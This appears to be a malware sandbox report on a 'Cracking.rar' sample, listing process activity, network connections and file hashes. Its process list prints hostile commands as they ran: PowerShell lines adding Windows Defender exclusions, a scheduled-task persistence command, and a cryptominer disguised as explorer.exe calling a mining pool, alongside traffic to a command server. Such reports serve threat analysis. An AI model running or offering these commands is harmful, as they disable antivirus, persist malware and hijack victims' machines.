"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\updates.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\updates.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Users\Admin\AppData\Local\Temp\updates.exe
"C:\Users\Admin\AppData\Local\Temp\updates.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE
"C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Generated1.txt
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\updates.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\updates.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP002.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 95.101.143.155:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 254.177.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.251.36.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.win-rar.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.121.68:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 163.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| NL | 142.251.36.10:443 | content-autofill.googleapis.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notifier.win-rar.com | udp |
| DE | 51.195.68.173:443 | notifier.win-rar.com | tcp |
| US | 8.8.8.8:53 | 173.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.33.222.23.in-addr.arpa | udp |
| DE | 51.195.68.173:443 | notifier.win-rar.com | tcp |
| US | 8.8.8.8:53 | 35.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | amazonhost.thedreamsop.com | udp |
| US | 107.180.2.24:80 | amazonhost.thedreamsop.com | tcp |
| US | 107.180.2.24:80 | amazonhost.thedreamsop.com | tcp |
| US | 8.8.8.8:53 | 24.2.180.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24-06-2022-8080.blogspot.com | udp |
| NL | 142.251.36.33:443 | 24-06-2022-8080.blogspot.com | tcp |
| US | 8.8.8.8:53 | 33.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcpanel.hackcrack.io | udp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 95.101.143.128:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 128.143.101.95.in-addr.arpa | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | 40.80.12.49.in-addr.arpa | udp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xcpanel.hackcrack.io | udp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
Files
C:\Users\Admin\Downloads\Cracking.rar
| MD5 | 024c45e8caedf9c6968db1f862621c29 |
| SHA1 | 7aa7c72d99aad341ad6b85b36f17e745548808d3 |
| SHA256 | 88362564f1f82fd3b8d520c5aa4925f62781ef58d4c5493b3d98e5c1c71210fd |
| SHA512 | 8a34c806982ac65290ebbbb6f1994647e21696a0572378ef1e0db83915addabd64ba5e3c43fc64c62f65865c114eeb098b3380f49c0380cb79599cbc9c9f9bc1 |
\??\pipe\crashpad_1872_KJQTTMTRYYICMEEI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f1f0fdf8b8140565bfcd2c4fe595e692 |
| SHA1 | 861e6dd91c9de132ee99d6834ee4f64c9e790019 |
| SHA256 | 4e58dc35111c9075d203001600b09e8a51265a5421adfd006789c3ca967b7706 |
| SHA512 | e7009cbcad3fbe4abb7bf564250b1b308148caead14bd2095feda30f50fe32ce9647975136b93c381e64b0b7bb98d944f98da0b7e28ef7188013ef069f683f20 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bff67454fc0fe4a96682b146e53ba39f |
| SHA1 | 3044d9a409840a708a2f2612a46d7597254480dd |
| SHA256 | de1c0d7f6106a22067f74543c58624f99ca555165308a37afea4632abed376e7 |
| SHA512 | 7cace92761dcc634a4192af7667cd601c0af25b86cbdead66b941d405ba62afefe8aff4856b2bc65cf3ad1e0defcb76bb8a4b335e1847743a43663870718a7ba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d3fa98d8c9571b288fa16077f7bad749 |
| SHA1 | 406d1c25208d89e1ac3d7b4b8d0e5a31a1e62efc |
| SHA256 | fd3018132e9501132f484a1648a53a10c3984e12b3372167a824d48b6ba7d61f |
| SHA512 | ed5e9a164134663a35c4e0908ea5bf8f6568ff8cdf1cc2bfa7cff50f9780a0e573eb471795aef8d70b9762175a30d356cf0c66a573159527324201fcb7dce780 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 691f84ad579f7207ea758b1f50f50888 |
| SHA1 | a45fa29a8b22a5ad121e7fba854196e2e2ea7d79 |
| SHA256 | 78b70ad43111a1ef5cda46a3518cc65932fcd697f669416cb62f6d5eda335d85 |
| SHA512 | ab163a8f543cab7efa701af54e29950ab21dc4ee03ab6ab6bdb7cf129cf2b350d09189aeac3b26d5d9329472d6b97fc33e9f944813469f63351d6f3728186163 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 23a1f6fbacf84e43e7a8420de719f93c |
| SHA1 | 0c4ba5e4650c87492676cdc2de4754bf914f0a2c |
| SHA256 | 2035fc0f5d412d3442e2e94383c45bbda1dfcde22f8d04d0670601d16a1eca99 |
| SHA512 | 0dbe54b934137851925fedbaa87347f43865a58db8b46a1f643ba10a2bf14c6ece4a0901a49744689bc26089b386441d774cc1b11beea35accc6ac1497662136 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4cd47068248b9799137f457c3b44c534 |
| SHA1 | f841c46843ebcb9b5ccfd2471e3a2940118df0cd |
| SHA256 | de16e880170ed2f0f5d59d8cc06c0dbb3a35ea9ba138dec8d0ae164fcdc448f1 |
| SHA512 | 50f7f8ce33370bf32352af33caea34d526c0f67a1caeb06988a07904de00b565091145f9bae3b1b920e4bd820f76cbe54262ef7f59293a199cae1c865d722d03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 1567352ee815902b77cb76c114d54c1c |
| SHA1 | 6b9085c86389b74ec04ce66097b09c1535571e3d |
| SHA256 | 87fe2882a190bdb12b5122d4470751fd34f5a2208597067a19fd98e8944ec018 |
| SHA512 | ef7b04efc7eb0a51bbd58ab4e28763d3f2dbb79b3c8bb7db6a102384a42312f1d816c50127fb0ed01c4429a56084639d116587feb2084f51a211b69e792ef8e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58ed39.TMP
| MD5 | df27346f3ea1e3751e1268e0117cde87 |
| SHA1 | 674ccebd54dda92ee629267a4f5486157ec51070 |
| SHA256 | 62f20ea9afd7cccafc753c8232f9f9e7277207fb5fb8e90c45c896be1d76e233 |
| SHA512 | 3ea4f57b592e7008c859f286a08eabc2288fde02c1923d18a23aaa77ff6b06d4835f32392d9e7284b5b563844d6cb2ce506e79518d23297a7bc6add338698d94 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 2c3289ce95918e4b8164108586c9974c |
| SHA1 | 6806ab1565a6b46628256bc97265a9fa13b0a9b7 |
| SHA256 | 212757651c19c3f6641eff85ff562ebfb2e4bf9c93b8d2e9a54b2cda8945e2b6 |
| SHA512 | ff12ac12738654ed196f12dbfd436f0b197e19e4f72159a25959be31f41f63819a684f77297480f8d5b2086ead03880030deb102f28584119fb8103a5191f86a |
C:\Users\Admin\Downloads\winrar-x64-622.exe
| MD5 | 8a3faa499854ea7ff1a7ea5dbfdfccfb |
| SHA1 | e0c4e5f7e08207319637c963c439e60735939dec |
| SHA256 | e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff |
| SHA512 | 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25 |
C:\Users\Admin\Downloads\winrar-x64-622.exe
| MD5 | 8a3faa499854ea7ff1a7ea5dbfdfccfb |
| SHA1 | e0c4e5f7e08207319637c963c439e60735939dec |
| SHA256 | e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff |
| SHA512 | 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25 |
C:\Users\Admin\Downloads\winrar-x64-622.exe
| MD5 | 8a3faa499854ea7ff1a7ea5dbfdfccfb |
| SHA1 | e0c4e5f7e08207319637c963c439e60735939dec |
| SHA256 | e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff |
| SHA512 | 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25 |
C:\Program Files\WinRAR\Uninstall.exe
| MD5 | 36297a3a577f3dcc095c11e5d76ede24 |
| SHA1 | ace587f83fb852d3cc9509386d7682f11235b797 |
| SHA256 | f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b |
| SHA512 | f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631 |
C:\Program Files\WinRAR\uninstall.exe
| MD5 | 36297a3a577f3dcc095c11e5d76ede24 |
| SHA1 | ace587f83fb852d3cc9509386d7682f11235b797 |
| SHA256 | f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b |
| SHA512 | f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631 |
C:\Program Files\WinRAR\Uninstall.exe
| MD5 | 36297a3a577f3dcc095c11e5d76ede24 |
| SHA1 | ace587f83fb852d3cc9509386d7682f11235b797 |
| SHA256 | f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b |
| SHA512 | f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 03edc1de158eadd2f54563bc6b52bb4b |
| SHA1 | 1ffd98fbc7cbd54c095831253b5123b3df0b172e |
| SHA256 | 1cade33a66db89fc2d71322cf7d350a1c0b4cb1281d22fa9442bf78ed470d82c |
| SHA512 | 658094df251fee7ecf430e5d43d775fcd8d161298f0a337a4716a67ac925695bdd28217a2a57913be061a71040e1bdf3deaa3f740594c789a51316a3e9a0e4dc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IJIZWXVF\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ae1bfbd6e0a3b0f03ab56beec65f3d35 |
| SHA1 | 5ffacfcdd4b0579899bd57511a27f51675a716ab |
| SHA256 | 42a2842ad1632085f438a385615658cf8f4306e4e5a6426761ce46be86e3272d |
| SHA512 | a5841c25356490e73263e4b68f8d7cb46ca8079de8877cfc3f031c7a84510823cc6e21e8659c09277356d75c53f09ce2360a0f7f19969383f7573593bc82df4f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 456adb308f94cb88535cdf3e5531f614 |
| SHA1 | ce13a26c25aa152a7ee35226899596894f897a0e |
| SHA256 | 9eb0d3b2aaea20009ed852749b12310da905c9ce47ece842125725ecc6f15710 |
| SHA512 | ac31d8735250472ed9da68a2d2e7640858523a9c0de2f2db7146bd3e7f19837fb563d86e02d7f095ea51ec0ccd74fb6e7e1c9ba67a7a4eec1e0d58123518dec7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4141a563b5c3b8ef4bae8438aceee56c |
| SHA1 | 76c221ef5b8f3a59a87c2bce9e1390351a81dc07 |
| SHA256 | cc66f64e5024bde60cdc08e3399d9da0456e0d0d0bc3f93eba4e95f0d473f716 |
| SHA512 | c7cc37b97f49e7bb2686ea30eebf563bf873b15aef0ff7e80ccbb48f7884b6642863e4dc03711b088ae8d5734bedbebe276c783ac1cb6901ddfd0b6882328053 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9cd1bef1df0a6393d58e791847bd002a |
| SHA1 | 6d4cabdc8a229ff8b64beff8507407ce8009d8b4 |
| SHA256 | d69c00e0cc36aa04e306377b3a2e81a435b8715e254e98c03a8020b68548da32 |
| SHA512 | 501af9cad448714542b0585bed9bf4c869553aee7c91a7d7d1392b4133d3bef586ee56d1fb937d0dd96b16ed26830c022be81d10fb5112f462b624cef9cd68bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | cd43ad830e9f61f071948dd2214e83dc |
| SHA1 | 64047747abe21917117af9188d91e95474c2c1da |
| SHA256 | f35ad5f3f37ee4d53ca6917adb60c8219ae93c64b549a813d62a9c9b9a187939 |
| SHA512 | efbcd6747825041cd593029f7ebb3310a37d35cd9d48b0ea0e220454b1c5f1f026c5976eda94a1be51279c70ef13ff36be1befacafbf65d7799e79f176d990e6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | bf4ce7c97d5c0fcaa3bfcf9e3eae6bb2 |
| SHA1 | 3c87b7cd5b821e87a671230ec8f9cef17052129d |
| SHA256 | 6efacc04201934c56d694bf61c4d78621a25576859d6067dc6112f13777efb89 |
| SHA512 | 737885da9bd12f3051fc1bb4ff53fc24d368809a1449b16282e0f439ba009800aeb03bc9361205b04f3bf67bd61aeaa5790dc24c66635cd9b8029622ede68328 |
C:\Program Files\WinRAR\WinRAR.exe
| MD5 | 04fbad3541e29251a425003b772726e1 |
| SHA1 | f6916b7b7a42d1de8ef5fa16e16409e6d55ace97 |
| SHA256 | 0244b889e1928a51b8552ab394f28b6419c00542a1bbc2366e661526790ec0a7 |
| SHA512 | 3e85cf46dd5a7cadc300488e6dadea7f271404fb571e46f07698b3e4eaac6225f52823371d33d41b6bbd7e6668cd60f29a13e6c94b9e9cb7e66090af6383d8b2 |
C:\Program Files\WinRAR\WhatsNew.txt
| MD5 | eaeee5f6ee0a3f0fe6f471a75aca13b8 |
| SHA1 | 58cd77ef76371e349e4bf9891d98120074bd850c |
| SHA256 | f723976575d08f1001b564532b0a849888135059e7c9343c453eead387d7ae4c |
| SHA512 | 3fc5994eefce000722679cf03b3e8f6d4a5e5ebfd9d0cc8f362e98b929d1c71e35313a183bfe3ab5adbd9ce52188ade167b8695a58ebd6476189b41627512604 |
C:\Program Files\WinRAR\Rar.txt
| MD5 | 18eeb70635ccbe518da5598ff203db53 |
| SHA1 | f0be58b64f84eac86b5e05685e55ebaef380b538 |
| SHA256 | 27b85e1a4ff7df5235d05b41f9d60d054516b16779803d8649a86a1e815b105b |
| SHA512 | 0b2a295b069722d75a15369b15bb88f13fbda56269d2db92c612b19578fc8dadf4f142ebb7ee94a83f87b2ddd6b715972df88b6bb0281853d40b1ce61957d3bd |
C:\Program Files\WinRAR\WinRAR.chm
| MD5 | 11d4425b6fc8eb1a37066220cac1887a |
| SHA1 | 7d1ee2a5594073f906d49b61431267d29d41300e |
| SHA256 | 326d091a39ced3317d9665ed647686462203b42f23b787a3ed4b4ad3e028cc1e |
| SHA512 | 236f7b514560d01656ffdee317d39e58a29f260acfd62f6b6659e7e2f2fca2ac8e6becac5067bab5a6ceaeaece6f942633548baeae26655d04ac3143a752be98 |
C:\Program Files\WinRAR\WinRAR.exe
| MD5 | 04fbad3541e29251a425003b772726e1 |
| SHA1 | f6916b7b7a42d1de8ef5fa16e16409e6d55ace97 |
| SHA256 | 0244b889e1928a51b8552ab394f28b6419c00542a1bbc2366e661526790ec0a7 |
